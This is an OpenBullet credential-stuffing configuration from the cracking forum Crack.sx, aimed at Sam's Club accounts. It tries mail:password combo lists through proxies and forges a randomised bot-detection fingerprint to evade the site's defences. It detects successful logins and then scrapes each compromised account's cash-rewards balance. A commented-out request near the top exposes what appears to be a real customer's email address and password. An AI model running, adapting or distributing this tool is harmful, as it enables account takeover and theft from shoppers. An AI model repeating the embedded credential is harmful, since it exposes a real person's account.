[SETTINGS]
{
  "Name": "SamsClub - Crack.sx",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-06-23T10:35:40.5107975+01:00",
  "AdditionalInfo": "Config provided by Reborn84#3037 for Crack.sx",
  "Author": "Crack.sx - Reborn84",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION RandomNum 10000 99999 -> VAR "Random" 

!REQUEST GET "https://www.samsclub.com/sams/account/signin/login.jsp?&redirectURL=%2F&displayMessage=false&displayMessage=false&_requestid=204552" 
!  
!  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
!  HEADER "Pragma: no-cache" 
!  HEADER "Accept: */*" 

!PARSE "<SOURCE>" LR "dynSessConf value=" " type" -> VAR "Token1" 

!REQUEST POST "https://www.samsclub.com/sams/account/signin/login.jsp?redirectURL=%2F&displayMessage=false&displayMessage=false&_DARGS=/sams/account/signin/memberLogin_new.jsp" 
!  CONTENT "_dyncharset=UTF-8&_dynSessConf=-261277247482100154&userName=blakistone%40lusfiber.net&_D%3AuserName=+&cfHiddenField=9a35G0m58Vrp3o5c1049848.22-9%2C5%2C-36%2C-497%2CMozilla%2F9.1+%28Windows+NT+52.1%3B+Win95%3B+x20%29+AppleWebKit%2F191.47+%28KHTML%2C+like+Gecko%29+Chrome%2F12.1.2209.281+Safari%2F404.67+Edge%2F39.47033%2Cuaend%2C54196%2C97161990%2Ctr-TR%2CGecko%2C9%2C3%2C6%2C2%2C413809%2C7412917%2C3539%2C8431%2C1766%2C3463%2C9113%2C9135%2C6631%2C%2Ccpen%3A8%2Ci7%3A4%2Cdm%3A9%2Ccwen%3A9%2Cnon%3A2%2Copc%3A1%2Cfc%3A3%2Csc%3A1%2Cwrc%3A2%2Cisc%3A6%2Cvib%3A3%2Cbat%3A1%2Cx47%3A4%2Cx25%3A8%2C0499%2C3.177248476398%2C616250427543%2Cloc%3A-7%2C6%2C-07%2C-814%2Cdo_en%2Cdm_en%2Ct_dis-4%2C8%2C-05%2C-876%2C1%2C9%2C6%2C5%2C2515%2C545%2C9%3B4%2C6%2C2%2C2%2C0827%2C6000%2C6%3B2%2C1%2C9%2C8%2C137%2C758%2C2%3B1%2C9%2C7%2C4%2C788%2C350%2C1%3B9%2C-2%2C1%2C9%2C141%2C641%2C7%3B-4%2C0%2C-50%2C-215%2C7%2C1%2C2%2C0%2C7028%2C961%2C8%3B4%2C8%2C4%2C7%2C3269%2C2920%2C8%3B3%2C6%2C2%2C2%2C796%2C700%2C3%3B6%2C2%2C1%2C0%2C608%2C501%2C6%3B2%2C-4%2C7%2C1%2C666%2C192%2C1%3B-0%2C9%2C-02%2C-762%2C1%2C4%2C918007%2C43%2C4%2C5%2C129%3B2%2C2%2C173570%2C78%2C7%2C5%2C911%3B8%2C6%2C351968%2C96%2C9%2C0%2C253%3B6%2C8%2C379997%2C40%2C1%2C7%2C503%3B5%2C1%2C802463%2C04%2C1%2C1%2C768%3B9%2C3%2C535996%2C-1%2C6%2C4%2C945%3B3%2C2%2C327729%2C37%2C3%2C5%2C963%3B6%2C8%2C671604%2C87%2C1%2C9%2C496%3B9%2C4%2C921019%2C43%2C4%2C5%2C129%3B0%2C2%2C186409%2C91%2C7%2C5%2C911%3B76%2C4%2C380707%2C25%2C3%2C6%2C043%3B08%2C3%2C330317%2C-3%2C3%2C7%2C963%3B05%2C7%2C462953%2C9%2C1%2C9%2C496%3B24%2C1%2C964810%2C4%2C4%2C1%2C129%3B27%2C9%2C517189%2C2%2C7%2C1%2C911%3B71%2C4%2C380677%2C0%2C9%2C6%2C-3%3B29%2C8%2C383993%2C71%2C1%2C7%2C-8%3B48%2C1%2C816697%2C04%2C1%2C1%2C-4%3B72%2C2%2C549324%2C7%2C3%2C6%2C-2%3B48%2C9%2C560670%2C3%2C1%2C3%2C2920%3B09%2C7%2C674104%2C88%2C1%2C3%2C1859%3B34%2C8%2C384077%2C40%2C1%2C7%2C2920%3B01%2C8%2C674599%2C57%2C1%2C3%2C1859%3B36%2C9%2C384394%2C71%2C1%2C3%2C2920%3B-0%2C8%2C-15%2C-087%2C3%2C9%2C594656%2C986%2C2514%3B4%2C7%2C449535%2C720%2C0562%3B4%2C2%2C105385%2C632%2C5302%3B2%2C8%2C546185%2C132%2C4047%3B7%2C9%2C594685%2C003%2C2467%3B8%2C7%2C449567%2C852%2C0400%3B8%2C2%2C105300%2C652%2C5341%3B6%2C8%2C546111%2C156%2C4075%3B1%2C9%2C594615%2C030%2C2397%3B2%2C7%2C449699%2C891%2C0315%3B31%2C4%2C909616%2C030%2C3143%3B88%2C4%2C021971%2C806%2C669%3B20%2C4%2C870438%2C585%2C043%3B79%2C3%2C367007%2C922%2C589%3B25%2C0%2C941420%2C429%2C907%3B82%2C4%2C021902%2C991%2C535%3B24%2C4%2C870461%2C679%2C918%3B73%2C3%2C367037%2C009%2C485%3B29%2C0%2C941451%2C580%2C926%3B86%2C4%2C021945%2C046%2C572%3B38%2C4%2C870492%2C605%2C877%3B87%2C3%2C367067%2C014%2C359%3B33%2C0%2C941591%2C599%2C807%3B90%2C4%2C021086%2C048%2C462%3B32%2C4%2C870558%2C606%2C868%3B798%2C4%2C534440%2C652%2C980%2C961%3B848%2C2%2C503244%2C156%2C479%2C768%3B557%2C5%2C918134%2C125%2C559%2C709%3B488%2C6%2C892320%2C559%2C423%2C496%3B284%2C1%2C381151%2C420%2C473%2C545%3B965%2C8%2C461667%2C919%2C270%2C253%3B674%2C4%2C337320%2C029%2C462%2C4331%3B942%2C5%2C545843%2C601%2C137%2C2549%3B410%2C1%2C812343%2C785%2C803%2C4816%3B-2%2C1%2C-07%2C-043%2C-3%2C3%2C-61%2C-290%2C-7%2C4%2C-23%2C-230%2C-4%2C8%2C-05%2C-885%2C-9%2C5%2C-36%2C-490%2C4%2C644%3B9%2C986%3B6%2C9337%3B0%2C6051%3B1%2C6680%3B4%2C020510%3B4%2C524688%3B0%2C595884%3B6%2C917039%3B5%2C896305%3B0%2C388030%3B-5%2C3%2C-81%2C-420%2C-7%2C6%2C-07%2C-828%2C4997747%2C9572538%2C8%2C3%2C6%2C2%2C27213061%2C184887%2C2858949708675%2C3674103750145%2C707%2C29678%2C55%2C227%2C6994%2C5%2C7%2C566186%2C56351232%2C3%2Cd1grwhe9u3brn16eay3t_5027%2C1880%2C435%2C7968053939%2C58867557-2%2C5%2C-65%2C-999%2C-5%2C1-4%2C9%2C-25%2C-06%2C6327952906%3B91%2C71%2C37%2C46%2C91%2C30%2C6%2C92%2C40%2C37%2C55%2C23%2C3%2C3%3B%2C36%3Btrue%3Btrue%3Btrue%3B-851%3Btrue%3B88%3B35%3Btrue%3Btrue%3B-5-2%2C5%2C-65%2C-69%2C2062-2%2C1%2C-07%2C-042%2C0830645-2%2C3%2C-20%2C-329%2C097953-0%2C8%2C-15%2C-098%2C%3B13%3B10%3B7&formName=loginForm&_D%3AformName=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.password=%24May101947&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.value.password=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginSuccessURL=%2F%3F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginSuccessURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.conflictingEmailURL=%2Faccount%2Fsignin%2FemailConflict.jsp%3FredirectURL%3D%252F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.conflictingEmailURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.emailSwitchURL=%2Faccount%2Fsignin%2FuserSwitchEmail.jsp%3FredirectURL%3D%252F&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.emailSwitchURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginFailureURL=fail.jsp&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginFailureURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.cartURL=..%2F..%2Fcart%2Fcart.jsp%3Fexpmsg%3Dsuccess&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.cartURL=+&chkUnmatch=true&_D%3AchkUnmatch=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginErrorURL=%2Fsams%2Faccount%2Fsignin%2Flogin.jsp%3F%26redirectURL%3D%252F%26displayMessage%3Dfalse%26displayMessage%3Dfalse%26_prevRequestId%3D210773%26displayMessage%3Dfalse%26displayMessage%3Dfalse&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.loginErrorURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.lostStolenURL=%2Faccount%2Fregistration%2FregisterNewCard.jsp%3FlostStolen%3Dtrue&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.lostStolenURL=+&%2Fatg%2Fuserprofiling%2FProfileFormHandler.login=submit&_D%3A%2Fatg%2Fuserprofiling%2FProfileFormHandler.login=+&_DARGS=%2Fsams%2Faccount%2Fsignin%2FmemberLogin_new.jsp" 
!  CONTENTTYPE "application/x-www-form-urlencoded" 
!  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/8.0; rv:12.0) like Gecko" 
!  HEADER "Pragma: no-cache" 
!  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
!  HEADER "Referer: https://www.samsclub.com/sams/account/signin/login.jsp?redirectURL=%2F" 
!  HEADER "Cache-Control: max-age=0" 
!  HEADER "Accept-Language: tr,en-US;q=0.7,en;q=0.3" 
!  HEADER "Content-Type: application/x-www-form-urlencoded" 
!  HEADER "Upgrade-Insecure-Requests: 1" 

REQUEST GET "https://www.samsclub.com/sams/account/signin/login.jsp?&redirectURL=%2F&displayMessage=false&displayMessage=false&_requestid=204552" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "dynSessConf value=" " type" -> VAR "Token1" 

REQUEST POST "https://www.samsclub.com/sams/account/signin/login.jsp?redirectURL=%2F&displayMessage=false&displayMessage=false&_DARGS=/sams/account/signin/memberLogin_new.jsp" 
  CONTENT "_dyncharset=UTF-8&_dynSessConf=<Token1>&userName=<USER>&_D:userName= &cfHiddenField=9a35G0m58Vrp3o5c1049848.22-9,5,-36,-497,Mozilla/9.1 (Windows NT 52.1; Win95; x20) AppleWebKit/191.47 (KHTML, like Gecko) Chrome/12.1.2209.281 Safari/404.67 Edge/39.47033,uaend,54196,97161990,tr-TR,Gecko,9,3,6,2,413809,7412917,3539,8431,1766,3463,9113,9135,6631,,cpen:8,i7:4,dm:9,cwen:9,non:2,opc:1,fc:3,sc:1,wrc:2,isc:6,vib:3,bat:1,x47:4,x25:8,0499,3.<Random>,6162504<Random>,loc:-7,6,-07,-<Random>,do_en,dm_en,t_dis-4,8,-05,-876,1,9,6,5,2515,545,9;4,6,2,2,0827,<Random>,6;2,1,9,8,137,758,2;1,9,7,4,788,350,1;9,-2,1,9,141,641,7;-4,0,-50,-215,7,1,2,0,7028,961,8;4,8,4,7,3269,<Random>,8;3,6,2,2,796,700,3;6,2,1,0,608,501,6;2,-4,7,1,666,192,1;-0,9,-02,-762,1,4,<Random>,43,4,5,129;2,2,<Random>,78,7,5,911;8,6,<Random>,96,9,0,253;6,8,<Random>,40,1,7,503;5,1,<Random>,04,1,1,768;9,3,<Random>,-1,6,4,945;3,2,32<Random>,37,3,5,963;6,8,67<Random>,87,1,9,496;9,4,92<Random>,43,4,5,129;0,2,18<Random>,91,7,5,911;76,4,3<Random>,25,3,6,043;08,3,3<Random>,-3,3,7,963;05,7,462953,9,1,9,496;24,1,9<Random>,4,4,1,129;27,9,5<Random>,2,7,1,911;71,4,<Random>7,0,9,6,-3;29,8,3<Random>,71,1,7,-8;48,1,<Random>7,04,1,1,-4;72,2,<Random>4,7,3,6,-2;48,9,5<Random>,3,1,3,2920;09,7,67<Random>,88,1,3,1859;34,8,<Random>7,40,1,7,2920;01,8,<Random>9,57,1,3,1859;36,9,384394,71,1,3,2920;-0,8,-15,-087,3,9,594656,986,2514;4,7,449535,720,0562;4,2,105385,632,5302;2,8,<Random>5,132,4047;7,9,5<Random>,003,2467;8,7,449567,852,0400;8,2,105300,652,5341;6,8,54<Random>,156,4075;1,9,<Random>5,030,2397;2,7,44<Random>,891,0315;31,4,9<Random>,030,3143;88,4,021971,806,669;20,4,<Random>8,585,043;79,3,367007,922,589;25,0,941420,429,907;82,4,021902,991,535;24,4,870461,679,918;73,3,367037,009,485;29,0,941451,580,926;86,4,021945,046,572;38,4,870492,605,877;87,3,367067,014,359;33,0,941591,599,807;90,4,021086,048,462;32,4,870558,606,868;798,4,534440,652,980,961;848,2,503244,156,479,768;557,5,918134,125,559,709;488,6,892320,559,423,496;284,1,381151,420,473,545;965,8,461667,919,270,253;674,4,337320,029,462,4331;942,5,545843,601,137,2549;410,1,812343,785,803,4816;-2,1,-07,-043,-3,3,-61,-290,-7,4,-23,-230,-4,8,-05,-885,-9,5,-36,-490,4,644;9,986;6,9337;0,6051;1,6680;4,0<Random>;4,<Random>8;0,5<Random>;6,917039;5,896305;0,<Random>30;-5,3,-81,-420,-7,6,-07,-828,4997747,9572538,8,3,6,2,27213061,184887,2858949708675,3674103750145,707,29678,55,227,6994,5,7,566186,56351232,3,d1grwhe9u3brn16eay3t_5027,1880,435,7968053939,58867557-2,5,-65,-999,-5,1-4,9,-25,-06,6327952906;91,71,37,46,91,30,6,92,40,37,55,23,3,3;,36;true;true;true;-851;true;88;35;true;true;-5-2,5,-65,-69,2062-2,1,-07,-042,0830645-2,3,-20,-329,097953-0,8,-15,-098,;13;10;7&formName=loginForm&_D:formName= &/atg/userprofiling/ProfileFormHandler.value.password=<PASS>&_D:/atg/userprofiling/ProfileFormHandler.value.password= &/atg/userprofiling/ProfileFormHandler.loginSuccessURL=/?&_D:/atg/userprofiling/ProfileFormHandler.loginSuccessURL= &/atg/userprofiling/ProfileFormHandler.conflictingEmailURL=/account/signin/emailConflict.jsp?redirectURL=%2F&_D:/atg/userprofiling/ProfileFormHandler.conflictingEmailURL= &/atg/userprofiling/ProfileFormHandler.emailSwitchURL=/account/signin/userSwitchEmail.jsp?redirectURL=%2F&_D:/atg/userprofiling/ProfileFormHandler.emailSwitchURL= &/atg/userprofiling/ProfileFormHandler.loginFailureURL=fail.jsp&_D:/atg/userprofiling/ProfileFormHandler.loginFailureURL= &/atg/userprofiling/ProfileFormHandler.cartURL=../../cart/cart.jsp?expmsg=success&_D:/atg/userprofiling/ProfileFormHandler.cartURL= &chkUnmatch=true&_D:chkUnmatch= &/atg/userprofiling/ProfileFormHandler.loginErrorURL=/sams/account/signin/login.jsp?&redirectURL=%2F&displayMessage=false&displayMessage=false&_prevRequestId=210773&displayMessage=false&displayMessage=false&_D:/atg/userprofiling/ProfileFormHandler.loginErrorURL= &/atg/userprofiling/ProfileFormHandler.lostStolenURL=/account/registration/registerNewCard.jsp?lostStolen=true&_D:/atg/userprofiling/ProfileFormHandler.lostStolenURL= &/atg/userprofiling/ProfileFormHandler.login=submit&_D:/atg/userprofiling/ProfileFormHandler.login= &_DARGS=/sams/account/signin/memberLogin_new.jsp" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT <Random>; WOW64; Trident/8.0; rv:<Random>) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Referer: https://www.samsclub.com/sams/account/signin/login.jsp?redirectURL=%2F" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Accept-Language: tr,en-US;q=0.7,en;q=0.3" 
  HEADER "Upgrade-Insecure-Requests: 1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your email address and password don&#39;t match" 
  KEYCHAIN Success OR 
    KEY "meta http-equiv=Refresh content=\"0; url=../../cart/cart.jsp?expmsg=success" 
    KEY "<html lang=en><head> <meta http-equiv=Refresh content=\"0; url=" 

REQUEST GET "https://www.samsclub.com/api/node/vivaldi/v1/account/cash-rewards" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: tr,en-US;q=0.7,en;q=0.3" 
  HEADER "content-type: application/json" 
  HEADER "Referer: https://www.samsclub.com/account?xid=hdr_account_cash-rewards" 

PARSE "<SOURCE>" LR "cashRewards\":{\"availableNowAmt\":" "," -> CAP "AvailableNow" 

PARSE "<SOURCE>" LR "earnedYrAmt\":" "," -> CAP "Earned" 

PARSE "<SOURCE>" LR "year\":\"" "\"" -> CAP "Year" 

PARSE "<SOURCE>" LR "month\":\"" "\"" -> CAP "Month" 

